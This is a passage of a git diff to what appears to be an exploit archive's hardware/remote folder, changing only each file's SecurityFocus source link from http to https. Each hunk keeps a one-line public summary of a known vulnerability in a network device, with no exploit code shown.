b/exploits/hardware/remote/31133.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27720/info +source: https://www.securityfocus.com/bid/27720/info F5 BIG-IP is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/31298.txt b/exploits/hardware/remote/31298.txt index 0739f87fe..06b51e216 100644 --- a/exploits/hardware/remote/31298.txt +++ b/exploits/hardware/remote/31298.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/27982/info +source: https://www.securityfocus.com/bid/27982/info Packeteer PacketShaper and PolicyCenter are prone to a cross-site scripting vulnerability because they fail to sufficiently sanitize user-supplied input data. diff --git a/exploits/hardware/remote/31311.txt b/exploits/hardware/remote/31311.txt index 3d79074b7..2a1e32aff 100644 --- a/exploits/hardware/remote/31311.txt +++ b/exploits/hardware/remote/31311.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28034/info +source: https://www.securityfocus.com/bid/28034/info Juniper Networks Secure Access 2000 is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/hardware/remote/31340.html b/exploits/hardware/remote/31340.html index ae3de53d3..c7d471009 100644 --- a/exploits/hardware/remote/31340.html +++ b/exploits/hardware/remote/31340.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28116/info +source: https://www.securityfocus.com/bid/28116/info Check Point VPN-1 UTM Edge is prone to a cross-site scripting vulnerability because it fails to adequately sanitize user-supplied input. diff --git a/exploits/hardware/remote/31342.txt b/exploits/hardware/remote/31342.txt index 105971425..a7eb951c2 100644 --- a/exploits/hardware/remote/31342.txt +++ b/exploits/hardware/remote/31342.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28122/info +source: https://www.securityfocus.com/bid/28122/info Airspan ProST WiMAX device is prone to an authentication-bypass vulnerability because it fails to perform adequate authentication checks in the web interface. diff --git a/exploits/hardware/remote/31364.txt b/exploits/hardware/remote/31364.txt index 836cbe2c7..df94d091c 100644 --- a/exploits/hardware/remote/31364.txt +++ b/exploits/hardware/remote/31364.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28151/info +source: https://www.securityfocus.com/bid/28151/info F5 BIG-IP Web Management Interface is prone to a HTML-injection vulnerability because the web management interface fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/31698.txt b/exploits/hardware/remote/31698.txt index 948832f31..53dcd974b 100644 --- a/exploits/hardware/remote/31698.txt +++ b/exploits/hardware/remote/31698.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/28902/info +source: https://www.securityfocus.com/bid/28902/info F5 Networks FirePass 4100 SSL VPN devices are prone to a cross-site scripting vulnerability because they fail to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/31828.txt b/exploits/hardware/remote/31828.txt index c80ebc098..f51d2f998 100644 --- a/exploits/hardware/remote/31828.txt +++ b/exploits/hardware/remote/31828.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29340/info +source: https://www.securityfocus.com/bid/29340/info Barracuda Spam Firewall is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/31862.txt b/exploits/hardware/remote/31862.txt index 23a9113a8..7866aabae 100644 --- a/exploits/hardware/remote/31862.txt +++ b/exploits/hardware/remote/31862.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29430/info +source: https://www.securityfocus.com/bid/29430/info Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/hardware/remote/31863.txt b/exploits/hardware/remote/31863.txt index a47b24f59..e6b9ade2a 100644 --- a/exploits/hardware/remote/31863.txt +++ b/exploits/hardware/remote/31863.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29430/info +source: https://www.securityfocus.com/bid/29430/info Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/hardware/remote/31864.txt b/exploits/hardware/remote/31864.txt index 91f949d54..4935011cf 100644 --- a/exploits/hardware/remote/31864.txt +++ b/exploits/hardware/remote/31864.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29430/info +source: https://www.securityfocus.com/bid/29430/info Xerox DocuShare is prone to multiple cross-site scripting vulnerabilities. diff --git a/exploits/hardware/remote/31885.txt b/exploits/hardware/remote/31885.txt index a8b2ee63d..64383cc19 100644 --- a/exploits/hardware/remote/31885.txt +++ b/exploits/hardware/remote/31885.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29574/info +source: https://www.securityfocus.com/bid/29574/info F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input. diff --git a/exploits/hardware/remote/31886.txt b/exploits/hardware/remote/31886.txt index b0d6a48d5..b7415c08e 100644 --- a/exploits/hardware/remote/31886.txt +++ b/exploits/hardware/remote/31886.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/29574/info +source: https://www.securityfocus.com/bid/29574/info F5 FirePass SSL VPN is prone to multiple cross-site request-forgery vulnerabilities because it fails to adequately sanitize user-supplied input. diff --git a/exploits/hardware/remote/32336.txt b/exploits/hardware/remote/32336.txt index 109d77c30..3fe6d6dd4 100644 --- a/exploits/hardware/remote/32336.txt +++ b/exploits/hardware/remote/32336.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31050/info +source: https://www.securityfocus.com/bid/31050/info D-Link DIR-100 is affected by a vulnerability that allows attackers to bypass security restrictions and access sites that are blocked by an administrator. diff --git a/exploits/hardware/remote/32390.html b/exploits/hardware/remote/32390.html index e39d6f74d..34040b3a9 100644 --- a/exploits/hardware/remote/32390.html +++ b/exploits/hardware/remote/32390.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31218/info +source: https://www.securityfocus.com/bid/31218/info The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/32391.html b/exploits/hardware/remote/32391.html index fb8cf00dc..d93c96dfa 100644 --- a/exploits/hardware/remote/32391.html +++ b/exploits/hardware/remote/32391.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31218/info +source: https://www.securityfocus.com/bid/31218/info The Cisco 871 Integrated Services Router is prone to a cross-site request-forgery vulnerability. diff --git a/exploits/hardware/remote/32469.txt b/exploits/hardware/remote/32469.txt index 5c1751756..7f8fc8c89 100644 --- a/exploits/hardware/remote/32469.txt +++ b/exploits/hardware/remote/32469.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31666/info +source: https://www.securityfocus.com/bid/31666/info The Proxim Tsunami MP.11 2411 Wireless Access Point is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied input data. diff --git a/exploits/hardware/remote/32552.txt b/exploits/hardware/remote/32552.txt index 482ae6ea0..31fb65291 100644 --- a/exploits/hardware/remote/32552.txt +++ b/exploits/hardware/remote/32552.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/31998/info +source: https://www.securityfocus.com/bid/31998/info SonicWALL Content Filtering is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input when displaying URI address data in a blocked-site error page. diff --git a/exploits/hardware/remote/32582.txt b/exploits/hardware/remote/32582.txt index bad0015ec..86ef8041b 100644 --- a/exploits/hardware/remote/32582.txt +++ b/exploits/hardware/remote/32582.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32275/info +source: https://www.securityfocus.com/bid/32275/info The Belkin F5D8233-4 Wireless N Router is prone to multiple vulnerabilities because of a lack of authentication when users access specific administration scripts. diff --git a/exploits/hardware/remote/32591.txt b/exploits/hardware/remote/32591.txt index 03df6916c..85f1cca14 100644 --- a/exploits/hardware/remote/32591.txt +++ b/exploits/hardware/remote/32591.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32358/info +source: https://www.securityfocus.com/bid/32358/info 3Com Wireless 8760 Dual-Radio 11a/b/g PoE Access Point is prone to multiple security vulnerabilities, including an HTML-injection issue and an authentication-bypass issue. diff --git a/exploits/hardware/remote/32599.txt b/exploits/hardware/remote/32599.txt index 87d538d1d..1f4d91bba 100644 --- a/exploits/hardware/remote/32599.txt +++ b/exploits/hardware/remote/32599.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32496/info +source: https://www.securityfocus.com/bid/32496/info Linksys WRT160N is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/32681.txt b/exploits/hardware/remote/32681.txt index aaefb59b5..92162c5e1 100644 --- a/exploits/hardware/remote/32681.txt +++ b/exploits/hardware/remote/32681.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/32975/info +source: https://www.securityfocus.com/bid/32975/info COMTREND CT-536 and HG-536 are prone to multiple remote vulnerabilities: diff --git a/exploits/hardware/remote/32723.txt b/exploits/hardware/remote/32723.txt index cbe211833..2c8845e59 100644 --- a/exploits/hardware/remote/32723.txt +++ b/exploits/hardware/remote/32723.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33260/info +source: https://www.securityfocus.com/bid/33260/info Cisco IOS HTTP Server is prone to multiple cross-site scripting vulnerabilities because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/32776.txt b/exploits/hardware/remote/32776.txt index a313aeee8..f9da3faca 100644 --- a/exploits/hardware/remote/32776.txt +++ b/exploits/hardware/remote/32776.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33625/info +source: https://www.securityfocus.com/bid/33625/info Cisco IOS HTTP Server is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/32801.txt b/exploits/hardware/remote/32801.txt index 3f0ac0e62..a362ddcc7 100644 --- a/exploits/hardware/remote/32801.txt +++ b/exploits/hardware/remote/32801.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/33779/info +source: https://www.securityfocus.com/bid/33779/info Barracuda Load Balancer is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/32878.txt b/exploits/hardware/remote/32878.txt index 6ae17cffc..0b5b44175 100644 --- a/exploits/hardware/remote/32878.txt +++ b/exploits/hardware/remote/32878.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34307/info +source: https://www.securityfocus.com/bid/34307/info Cisco ASA is prone to a cross-site scripting vulnerability. diff --git a/exploits/hardware/remote/32931.html b/exploits/hardware/remote/32931.html index d1a2e2af7..399be1a80 100644 --- a/exploits/hardware/remote/32931.html +++ b/exploits/hardware/remote/32931.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34616/info +source: https://www.securityfocus.com/bid/34616/info The Linksys WRT54GC router is prone to an access-validation vulnerability because of a lack of authentication when users access specific administration applications. diff --git a/exploits/hardware/remote/32954.txt b/exploits/hardware/remote/32954.txt index d142defbb..b04c65bb9 100644 --- a/exploits/hardware/remote/32954.txt +++ b/exploits/hardware/remote/32954.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34713/info +source: https://www.securityfocus.com/bid/34713/info Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera is prone to multiple directory-traversal vulnerabilities because the software fails to sufficiently sanitize user-supplied input. diff --git a/exploits/hardware/remote/32955.js b/exploits/hardware/remote/32955.js index 64b5344ab..8cf3d69aa 100644 --- a/exploits/hardware/remote/32955.js +++ b/exploits/hardware/remote/32955.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/34714/info +source: https://www.securityfocus.com/bid/34714/info Linksys WVC54GCA Wireless-G Internet Home Monitoring Camera is prone to multiple cross-site scripting vulnerabilities because the software fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/33010.txt b/exploits/hardware/remote/33010.txt index 0114e7f41..11f78f101 100644 --- a/exploits/hardware/remote/33010.txt +++ b/exploits/hardware/remote/33010.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35093/info +source: https://www.securityfocus.com/bid/35093/info SonicWALL Global VPN Client is prone to a remote format-string vulnerability because it fails to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/hardware/remote/33016.txt b/exploits/hardware/remote/33016.txt index 6b69c8ac5..8692e36fc 100644 --- a/exploits/hardware/remote/33016.txt +++ b/exploits/hardware/remote/33016.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35145/info +source: https://www.securityfocus.com/bid/35145/info Multiple SonicWALL SSL-VPN devices are prone to a remote format-string vulnerability because they fail to properly sanitize user-supplied input before passing it as the format specifier to a formatted-printing function. diff --git a/exploits/hardware/remote/33044.html b/exploits/hardware/remote/33044.html index aae6baee2..2fbdf9f28 100644 --- a/exploits/hardware/remote/33044.html +++ b/exploits/hardware/remote/33044.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35425/info +source: https://www.securityfocus.com/bid/35425/info Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically. diff --git a/exploits/hardware/remote/33045.html b/exploits/hardware/remote/33045.html index bb665c26f..14566e3dc 100644 --- a/exploits/hardware/remote/33045.html +++ b/exploits/hardware/remote/33045.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35425/info +source: https://www.securityfocus.com/bid/35425/info Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically. diff --git a/exploits/hardware/remote/33046.html b/exploits/hardware/remote/33046.html index 2b72578f0..78c27fb2d 100644 --- a/exploits/hardware/remote/33046.html +++ b/exploits/hardware/remote/33046.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35425/info +source: https://www.securityfocus.com/bid/35425/info Apple iPhone is prone to a security-bypass vulnerability that may cause a call to be placed automatically. diff --git a/exploits/hardware/remote/33054.txt b/exploits/hardware/remote/33054.txt index 5f8130dd0..259ffe850 100644 --- a/exploits/hardware/remote/33054.txt +++ b/exploits/hardware/remote/33054.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35475/info +source: https://www.securityfocus.com/bid/35475/info Cisco Adaptive Security Appliance (ASA) is prone to a vulnerability that can aid in phishing attacks. diff --git a/exploits/hardware/remote/33055.html b/exploits/hardware/remote/33055.html index 2df405b84..51cb943ec 100644 --- a/exploits/hardware/remote/33055.html +++ b/exploits/hardware/remote/33055.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/35476/info +source: https://www.securityfocus.com/bid/35476/info Cisco ASA (Adaptive Security Appliance) is prone to a cross-site scripting vulnerability because its Web VPN fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33165.txt b/exploits/hardware/remote/33165.txt index 4d5a063e3..ad64c3eca 100644 --- a/exploits/hardware/remote/33165.txt +++ b/exploits/hardware/remote/33165.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36031/info +source: https://www.securityfocus.com/bid/36031/info Multiple 2Wire routers are prone to an access-validation vulnerability because they fail to adequately authenticate users before performing certain actions. diff --git a/exploits/hardware/remote/33177.txt b/exploits/hardware/remote/33177.txt index 874c1ac05..75aaa3429 100644 --- a/exploits/hardware/remote/33177.txt +++ b/exploits/hardware/remote/33177.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36076/info +source: https://www.securityfocus.com/bid/36076/info The NetGear WNR2000 is prone to multiple remote information-disclosure issues because it fails to restrict access to sensitive information. diff --git a/exploits/hardware/remote/33234.txt b/exploits/hardware/remote/33234.txt index bb8a86186..41422f709 100644 --- a/exploits/hardware/remote/33234.txt +++ b/exploits/hardware/remote/33234.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36466/info +source: https://www.securityfocus.com/bid/36466/info Check Point Connectra is prone to an arbitrary-script-injection vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33257.txt b/exploits/hardware/remote/33257.txt index eb92d3fc4..70f20f970 100644 --- a/exploits/hardware/remote/33257.txt +++ b/exploits/hardware/remote/33257.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33258.txt b/exploits/hardware/remote/33258.txt index ef7e2419e..624dabefc 100644 --- a/exploits/hardware/remote/33258.txt +++ b/exploits/hardware/remote/33258.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33259.txt b/exploits/hardware/remote/33259.txt index 085510098..6cd99e959 100644 --- a/exploits/hardware/remote/33259.txt +++ b/exploits/hardware/remote/33259.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33260.txt b/exploits/hardware/remote/33260.txt index cf6e7295e..a69dd0777 100644 --- a/exploits/hardware/remote/33260.txt +++ b/exploits/hardware/remote/33260.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33261.txt b/exploits/hardware/remote/33261.txt index 762843384..07628ffb4 100644 --- a/exploits/hardware/remote/33261.txt +++ b/exploits/hardware/remote/33261.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36537/info +source: https://www.securityfocus.com/bid/36537/info Juniper Networks JUNOS is prone to multiple cross-site scripting and HTML-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data to J-Web (Juniper Web Management). diff --git a/exploits/hardware/remote/33265.js b/exploits/hardware/remote/33265.js index fc4d71501..de79a69e4 100644 --- a/exploits/hardware/remote/33265.js +++ b/exploits/hardware/remote/33265.js @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/36592/info +source: https://www.securityfocus.com/bid/36592/info Palm WebOS is prone to an arbitrary-script-injection vulnerability because the integrated email application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33423.txt b/exploits/hardware/remote/33423.txt index ea8bb96c3..4d3097a27 100644 --- a/exploits/hardware/remote/33423.txt +++ b/exploits/hardware/remote/33423.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37432/info +source: https://www.securityfocus.com/bid/37432/info The Barracuda Web Application Firewall 660 is prone to multiple HTML-injection vulnerabilities. diff --git a/exploits/hardware/remote/33471.txt b/exploits/hardware/remote/33471.txt index f27e220d3..3816592b7 100644 --- a/exploits/hardware/remote/33471.txt +++ b/exploits/hardware/remote/33471.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37646/info +source: https://www.securityfocus.com/bid/37646/info D-LINK DKVM-IP8 is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33567.txt b/exploits/hardware/remote/33567.txt index 38253dae2..a25bd09df 100644 --- a/exploits/hardware/remote/33567.txt +++ b/exploits/hardware/remote/33567.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37960/info +source: https://www.securityfocus.com/bid/37960/info Cisco Secure Desktop is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33568.txt b/exploits/hardware/remote/33568.txt index d5e95323c..823005c81 100644 --- a/exploits/hardware/remote/33568.txt +++ b/exploits/hardware/remote/33568.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/37962/info +source: https://www.securityfocus.com/bid/37962/info MiFi 2352 is prone to an information-disclosure vulnerability that may expose sensitive information. diff --git a/exploits/hardware/remote/33580.txt b/exploits/hardware/remote/33580.txt index 4baf396bf..1ca9cdf8b 100644 --- a/exploits/hardware/remote/33580.txt +++ b/exploits/hardware/remote/33580.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38004/info +source: https://www.securityfocus.com/bid/38004/info Comtrend CT-507 IT is prone to a cross-site scripting vulnerability because the device's web interface fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33648.txt b/exploits/hardware/remote/33648.txt index b9213b280..8f410421c 100644 --- a/exploits/hardware/remote/33648.txt +++ b/exploits/hardware/remote/33648.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/38261/info +source: https://www.securityfocus.com/bid/38261/info Huawei HG510 is prone to multiple cross-site request-forgery vulnerabilities. diff --git a/exploits/hardware/remote/33869.txt b/exploits/hardware/remote/33869.txt index c8e84b4e6..b27af74f3 100644 --- a/exploits/hardware/remote/33869.txt +++ b/exploits/hardware/remote/33869.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39646/info +source: https://www.securityfocus.com/bid/39646/info The Huawei EchoLife HG520 is prone to an information-disclosure vulnerability. diff --git a/exploits/hardware/remote/33938.txt b/exploits/hardware/remote/33938.txt index 6a51dcd56..66decf07f 100644 --- a/exploits/hardware/remote/33938.txt +++ b/exploits/hardware/remote/33938.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/39928/info +source: https://www.securityfocus.com/bid/39928/info The Sterlite SAM300 AX Router is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/33962.txt b/exploits/hardware/remote/33962.txt index 58cacba84..d03f6066e 100644 --- a/exploits/hardware/remote/33962.txt +++ b/exploits/hardware/remote/33962.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40002/info +source: https://www.securityfocus.com/bid/40002/info Cisco Application Control Engine (ACE) is prone to a security weakness that may allow attackers to obfuscate HTTP server log entries. diff --git a/exploits/hardware/remote/34018.txt b/exploits/hardware/remote/34018.txt index 3d565bb84..87493d101 100644 --- a/exploits/hardware/remote/34018.txt +++ b/exploits/hardware/remote/34018.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40292/info +source: https://www.securityfocus.com/bid/40292/info U.S.Robotics USR5463 firmware is prone to an HTML-injection vulnerability because it fails to sufficiently sanitize user-supplied data. diff --git a/exploits/hardware/remote/34033.html b/exploits/hardware/remote/34033.html index 24ebfeb4a..8ba2a1aed 100644 --- a/exploits/hardware/remote/34033.html +++ b/exploits/hardware/remote/34033.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/40346/info +source: https://www.securityfocus.com/bid/40346/info Cisco DPC2100 (formerly Scientific Atlanta DPC2100) is prone to multiple security-bypass and cross-site request-forgery vulnerabilities. diff --git a/exploits/hardware/remote/34182.txt b/exploits/hardware/remote/34182.txt index 97e95a2d7..0350ccbb9 100644 --- a/exploits/hardware/remote/34182.txt +++ b/exploits/hardware/remote/34182.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41061/info +source: https://www.securityfocus.com/bid/41061/info Linksys WAP54Gv3 Wireless Router is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/34184.txt b/exploits/hardware/remote/34184.txt index b14b41d65..4da8f5d59 100644 --- a/exploits/hardware/remote/34184.txt +++ b/exploits/hardware/remote/34184.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41072/info +source: https://www.securityfocus.com/bid/41072/info Trend Micro InterScan Web Security Virtual Appliance is prone to multiple vulnerabilities. diff --git a/exploits/hardware/remote/34200.txt b/exploits/hardware/remote/34200.txt index 8e778dc47..ca5ea208f 100644 --- a/exploits/hardware/remote/34200.txt +++ b/exploits/hardware/remote/34200.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41159/info +source: https://www.securityfocus.com/bid/41159/info Cisco Adaptive Security Response (ASA) is prone to an HTTP response-splitting vulnerability. diff --git a/exploits/hardware/remote/34208.txt b/exploits/hardware/remote/34208.txt index c2556ca70..3af59c492 100644 --- a/exploits/hardware/remote/34208.txt +++ b/exploits/hardware/remote/34208.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41187/info +source: https://www.securityfocus.com/bid/41187/info The D-Link DAP-1160 wireless access point (WAP) is prone to a security-bypass vulnerability. diff --git a/exploits/hardware/remote/34316.txt b/exploits/hardware/remote/34316.txt index 14b37cbd7..b976d5f1d 100644 --- a/exploits/hardware/remote/34316.txt +++ b/exploits/hardware/remote/34316.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/41664/info +source: https://www.securityfocus.com/bid/41664/info Juniper Networks SA2000 SSL VPN appliance is prone to a cross-site scripting vulnerability because the web interface fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/34802.html b/exploits/hardware/remote/34802.html index bbf18d63e..956ab93d8 100644 --- a/exploits/hardware/remote/34802.html +++ b/exploits/hardware/remote/34802.html @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/43685/info +source: https://www.securityfocus.com/bid/43685/info Research In Motion BlackBerry Device Software is prone to a cross-domain information-disclosure vulnerability because the application's web browser fails to properly enforce the same-origin policy. diff --git a/exploits/hardware/remote/34986.txt b/exploits/hardware/remote/34986.txt index fc7e49d42..5e50bef6c 100644 --- a/exploits/hardware/remote/34986.txt +++ b/exploits/hardware/remote/34986.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/44743/info +source: https://www.securityfocus.com/bid/44743/info The D-Link DIR-300 wireless router is prone to multiple security-bypass vulnerabilities. diff --git a/exploits/hardware/remote/35014.txt b/exploits/hardware/remote/35014.txt index c7c2af778..733a8662b 100644 --- a/exploits/hardware/remote/35014.txt +++ b/exploits/hardware/remote/35014.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45038/info +source: https://www.securityfocus.com/bid/45038/info The D-Link DIR-300 wireless router is prone to a security-bypass vulnerability. diff --git a/exploits/hardware/remote/35068.txt b/exploits/hardware/remote/35068.txt index f5be93095..823a67f58 100644 --- a/exploits/hardware/remote/35068.txt +++ b/exploits/hardware/remote/35068.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45272/info +source: https://www.securityfocus.com/bid/45272/info pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35069.txt b/exploits/hardware/remote/35069.txt index 0b7252ded..3774d0340 100644 --- a/exploits/hardware/remote/35069.txt +++ b/exploits/hardware/remote/35069.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45272/info +source: https://www.securityfocus.com/bid/45272/info pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35070.txt b/exploits/hardware/remote/35070.txt index ad37fa970..863716ec6 100644 --- a/exploits/hardware/remote/35070.txt +++ b/exploits/hardware/remote/35070.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45272/info +source: https://www.securityfocus.com/bid/45272/info pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35071.txt b/exploits/hardware/remote/35071.txt index c59e1bc4b..f44ef29a8 100644 --- a/exploits/hardware/remote/35071.txt +++ b/exploits/hardware/remote/35071.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45272/info +source: https://www.securityfocus.com/bid/45272/info pfSense is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35170.txt b/exploits/hardware/remote/35170.txt index 9b1203e2b..4dec60cd4 100644 --- a/exploits/hardware/remote/35170.txt +++ b/exploits/hardware/remote/35170.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/45688/info +source: https://www.securityfocus.com/bid/45688/info Lexmark Printer X651de is prone to an HTML-injection vulnerability because it fails to properly sanitize user-supplied input before using it in dynamically generated content. diff --git a/exploits/hardware/remote/35317.txt b/exploits/hardware/remote/35317.txt index bfda3564f..143d3c679 100644 --- a/exploits/hardware/remote/35317.txt +++ b/exploits/hardware/remote/35317.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/46224/info +source: https://www.securityfocus.com/bid/46224/info Multiple Check Point endpoint security products are prone to multiple information-disclosure vulnerabilities. diff --git a/exploits/hardware/remote/35597.txt b/exploits/hardware/remote/35597.txt index 77b8147cd..6910d65cb 100644 --- a/exploits/hardware/remote/35597.txt +++ b/exploits/hardware/remote/35597.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47277/info +source: https://www.securityfocus.com/bid/47277/info Fiberhome HG-110 is prone to a cross-site scripting vulnerability and a directory-traversal vulnerability because it fails to sufficiently sanitize user-supplied input. diff --git a/exploits/hardware/remote/35620.txt b/exploits/hardware/remote/35620.txt index 10420b8ff..12512f9e2 100644 --- a/exploits/hardware/remote/35620.txt +++ b/exploits/hardware/remote/35620.txt @@ -1,4 +1,4 @@ -source: http://www.securityfocus.com/bid/47390/info +source: https://www.securityfocus.com/bid/47390/info Technicolor THOMSON TG585v7 Wireless Router is prone to a cross-site scripting vulnerability because the application fails to properly sanitize user-supplied input. diff --git a/exploits/hardware/remote/35762.txt b/exploits/hardware/remote/35762.txt index 